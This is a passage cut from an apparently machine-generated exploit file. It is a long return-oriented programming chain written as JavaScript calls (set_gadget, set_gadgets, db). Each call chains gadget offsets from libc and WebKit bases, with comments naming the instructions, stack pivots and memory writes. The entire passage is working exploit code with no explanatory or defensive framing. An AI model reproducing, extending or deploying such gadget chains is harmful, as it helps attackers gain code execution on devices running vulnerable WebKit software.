0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+249336, //L4558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+249320, //L4557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4556: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4557: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4558: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+249424, //L4559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+249456, //L4561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4560: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4561: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+249528, //L4562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4562: db([0, 0]); // 0x0 //L4530: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+249656, //L4565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249672, //L4566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+249640, //L4564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4564: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4565: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4566: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+249832, //L4571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249848, //L4572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+249784, //L4568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4568: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4569: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4570: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4571: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4572: 
db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+249960, //L4573+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+249952, //L4573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4573: db([0, 0]); // 0x0 set_gadgets([ ropchain+249976, //L4573+24 ropchain+250928, //L4567 libc_base+764760, //pop rsi ropchain+250016, //L4574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4576: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+250136, //L4579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250120, //L4577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4577: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4579: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+250280, //L4582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250248, //L4580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+250264, //L4581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4580: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4581: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4582: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+250376, //L4584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4583: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4584: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4585: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+250480, //L4586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250496, //L4587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4586: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4587: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+250672, //L4589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250688, //L4590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250656, //L4588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4588: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4589: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4590: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+250832, //L4593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250848, //L4594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+250800, //L4591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4592: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+250920, //L4595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4595: db([0, 0]); // 0x0 //L4567: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+251048, //L4598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251064, //L4599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+251032, //L4597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4599: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251176, //L4601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251224, //L4604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251192, //L4602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4601: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4602: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4603: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L4604: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+251336, //L4605+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+251328, //L4605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4605: db([0, 0]); // 0x0 set_gadgets([ ropchain+251352, //L4605+24 ropchain+253376, //L4600 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+251392, //L4606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4607: db([88, 0]); // 0x58 set_gadget(libc_base+144605,); //pop rdi //L4608: db([88, 0]); // 0x58 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251584, //L4612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+251552, //L4610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251568, //L4611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4609: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4610: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4611: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4612: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+251640, //L4614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4614: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+251768, //L4616 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251784, //L4617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251752, //L4615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4615: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4616: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4617: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251880, //L4619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251864, //L4618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4618: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4619: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+251960, //L4620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4622: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252080, //L4625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252064, //L4623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4623: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4625: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+252224, //L4628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+252192, //L4626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+252208, //L4627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4628: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+252296, //L4630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4630: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252352, //L4631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4631: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252432, //L4633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4633: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4635: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252552, //L4638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252536, //L4636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4636: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4638: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+252696, //L4641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+252664, //L4639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+252680, //L4640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4640: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4641: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252784, //L4643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4642: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4643: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252840, //L4644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4644: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4646: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+252920, //L4648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4648: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+253024, //L4649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+253040, //L4650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4649: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4650: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+253128, //L4652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4652: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+253184, //L4653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4653: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+253256, //L4656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4656: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+253312, //L4657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4657: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+258080, //L4659 //L4600: libc_base+764760, //pop rsi ropchain+253416, //L4660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4660: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4662: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+253536, //L4665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+253520, //L4663 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4665: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+253712, //L4668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+253728, //L4669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+253680, //L4666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+253696, //L4667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4666: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4667: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4668: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4669: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+253888, //L4673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+253856, //L4671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+253872, //L4672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4670: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4671: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4672: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4673: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+253992, //L4675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+253976, 
//L4674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4674: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4675: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+254088, //L4677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4676: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4678: db([2, 0]); // 0x2 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+254192, //L4679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254208, //L4680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4679: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4680: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+254376, //L4682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254392, //L4683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254360, //L4681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4681: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4682: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4683: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, 
//movsxd rax, edi libc_base+764760, //pop rsi ropchain+254552, //L4688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254568, //L4689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+254504, //L4685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4685: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4686: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4687: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4688: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4689: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+254680, //L4690+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+254672, //L4690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4690: db([0, 0]); // 0x0 set_gadgets([ ropchain+254696, //L4690+24 ropchain+255648, //L4684 libc_base+764760, //pop rsi ropchain+254736, //L4691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4693: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+254856, //L4696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254840, //L4694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4696: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov 
rax, [rdi] libc_base+764760, //pop rsi ropchain+255000, //L4699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254968, //L4697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+254984, //L4698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4697: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4698: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4699: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+255096, //L4701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4700: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4702: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+255200, //L4703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255216, //L4704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4703: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4704: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+255392, //L4706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255408, 
